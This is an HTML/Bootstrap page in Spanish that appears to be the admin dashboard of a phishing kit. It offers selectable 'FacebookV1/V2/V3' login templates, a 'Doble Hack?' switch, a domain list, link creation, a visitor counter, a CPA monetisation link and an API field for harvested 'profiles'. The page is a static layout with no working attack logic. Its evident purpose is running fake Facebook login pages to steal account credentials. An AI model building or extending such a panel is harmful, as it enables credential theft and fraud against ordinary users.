<!doctype html>
<html lang="en" data-bs-theme="dark">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Bootstrap demo</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" integrity="sha384-VJg4c8CcyoUnpGNtmE4xI2rlyJtxw+drGEaiRSFPZrcUosYq/tJ4HhifP2yOI+aC" crossorigin="anonymous">
    <link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/gh/lipis/flag-icons@7.0.0/css/flag-icons.min.css"
/>
<style>
    .custom-divider {
        width: 100%; /* Ancho personalizado */
        margin: 0 auto; /* Centrar horizontalmente */
        border-color: #ff0000; /* Color de la línea */
        border-width: 10px; /* Grosor de la línea */
    }
</style>
</head>
  <body>
    <nav class="navbar navbar-expand-lg bg-body-tertiary" data-bs-theme="dark">
        <div class="container-fluid">
          <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
          </button>
          <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav me-auto mb-2 mb-lg-0">
              <li class="nav-item">
                <a class="nav-link" class="font-monospace" aria-current="page" href="#">Inicio</a>
              </li>
              <li class="nav-item">
              <a class="nav-link" class="font-monospace" aria-current="page" href="#">Lista De Dominios</a>
              </li>
              <li class="nav-item">
              <a class="nav-link" class="font-monospace" href="#">Crear Link</a>
              </li>
              <li class="nav-item">
              <a class="nav-link" aria-current="page" href="#">Configuracion</a>
              </li>
            </ul>
            <ul>
                <a class="nav-link" class="font-monospace" href="#">   </a>
                <div class="font-monospace">Aldo Tiburcio</div>
            </ul>
          </div>
        </div>
      </nav>

      <div class="container mt-4">
        <div class="mb-3">
            <label class="form-label font-monospace">Selecciona tu Plantilla:</label>
            <div class="row">
                <div class="col-sm-4">
                    <div class="form-check">
                        <input class="form-check-input" type="radio" name="plantilla" value="opcion1" id="opcion1">
                        <label class="form-check-label font-monospace" for="opcion1">FacebookV1</label>
                        <img src="https://www.vishweshwarbank.com/eng/facebook-login/img/fb-login.jpg" class="img-thumbnail" alt="...">
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="form-check">
                        <input class="form-check-input" type="radio" name="plantilla" value="opcion2" id="opcion2">
                        <label class="form-check-label font-monospace" for="opcion2">FacebookV2</label>
                        <img src="https://www.vishweshwarbank.com/eng/facebook-login/img/fb-login.jpg" class="img-thumbnail" alt="...">
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="form-check">
                        <input class="form-check-input" type="radio" name="plantilla" value="opcion3" id="opcion3">
                        <label class="form-check-label font-monospace" for="opcion3">FacebookV3</label>
                        <img src="https://www.vishweshwarbank.com/eng/facebook-login/img/fb-login.jpg" class="img-thumbnail" alt="...">
                    </div>
                </div>
            </div>
        </div>
    </div>
    


    <div class="container mt-4">
        <div class="mb-3">
            <label class="form-label font-monospace">Doble Hack?</label>
            <div class="row">
                <div class="col-sm-4">
                    <div class="form-check">
                        <input class="form-check-input" type="radio" name="plantilla" value="false" id="false">
                        <label class="form-check-label font-monospace" for="false">False</label>
                    </div>
                </div>
                <div class="col-sm-4">
                    <div class="form-check">
                        <input class="form-check-input" type="radio" name="plantilla" value="true" id="true">
                        <label class="form-check-label font-monospace" for="true">True</label>
                    </div>
                </div>
                
            </div>
        </div>
    </div>
    
        
        
          

        <div class="container mt-4">
            <div class="mb- row align-items-center">
                <label class="col-sm-2 col-form-label font-monospace">Contador : </label>
                <div class="col-sm-6">
                    <input type="number" class="form-control" id="exampleFormControlInput1" placeholder="https://whos.amung.us/stats/readers/mrfugard">
                </div>
                <div class="col-sm-2">
                    <button type="button" class="btn btn-primary font-monospace" >GUARDAR</button>
                </div>
            </div>
        </div>
        <div class="container mt-4">
            <div class="mb- row align-items-center">
                <label class="col-sm-2 col-form-label font-monospace">LinkCPA : </label>
                <div class="col-sm-6">
                    <input type="number" class="form-control" id="exampleFormControlInput1" placeholder="youtube.com">
                </div>
                <div class="col-sm-2">
                    <button type="button" class="btn btn-primary font-monospace" >GUARDAR</button>
                </div>
            </div>
        </div>

        <hr class="my-5 custom-divider"> 

        
        <div class="container mt-4 center">
            <div class="mb- row align-items-center">
                <label class="col-sm-2 col-form-label font-monospace">SCRIPTS </label>
                <div class="col-sm-6">
                    <input type="text" class="form-control" id="exampleFormControlInput1" placeholder="Tu SCRIPTS MMG" readonly>
                </div>
              
            
            <div class="container mt-4 center">
                <div class="mb- row align-items-center">
                    <label class="col-sm-2 col-form-label font-monospace">API PERFILES</label>
                    <div class="col-sm-6">
                        <input type="text" class="form-control" id="exampleFormControlInput1" value="MiDominio.us/apiv2/estado=0&Security=hidlkayhiudyoasd&Delete=True" readonly>
                    </div>
                    <div class="col-sm-2">
                        <button type="button" class="btn btn-primary font-monospace" >CAMBIAR TOKEN</button>
                    </div>
                </div>
            </div>
        
        <hr class="my-5 custom-divider"> 
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
  </body>
</html>
